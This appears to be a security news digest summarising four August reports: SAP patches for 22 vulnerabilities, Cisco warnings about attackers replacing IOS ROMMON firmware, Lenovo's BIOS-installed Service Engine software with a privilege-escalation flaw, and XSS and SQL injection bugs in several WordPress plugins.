August 13, Securityweek – (International) SAP Security updates patch 22 vulnerabilities. SAP released patches for 22 vulnerabilities and updated four previously release patches, including a remote code execution flaw in SAP ST-P that an attacker could leverage to compromise SAP servers and access information stored on them, and a Reflected File Download (RFD) in SAP’s NetWeaver AFP Servlet that could be exploited to push malware onto victims’ devices using a specially crafted link, among other flaws. Source
August 13, Help Net Security – (International) Cisco spots attackers hijacking its networking gear by modifying firmware. Cisco reported that attackers have been conducting attacks in-the-wild in which they gain administrative or physical access to an IOS device before replacing the IOS ROMMON with a malicious ROMMON image in order to manipulate device behavior. Source
August 12, The Register – (International) CAUGHT: Lenovo crams unremovable crapware into Windows laptops – by hiding it in the BIOS. Security researchers reported that Lenovo bundled laptops with persistent firmware that installs the Lenovo Service Engine (LSE) software, which is vulnerable to a buffer-overflow flaw that could be exploited to gain administrator-level privileges. The LSE software is no longer included in new laptops. Source
August 12, Threatpost – (International) Vulnerabilities identified in several WordPress plugins. Researchers from dxw Security discovered cross-site scripting (XSS) and blind Structured Query Language (SQL) vulnerabilities in WordPress’ iframe version 3.0, Yoast’s Google Analytics, and Symposium plugins for WordPress that could give some users administrative privileges. Source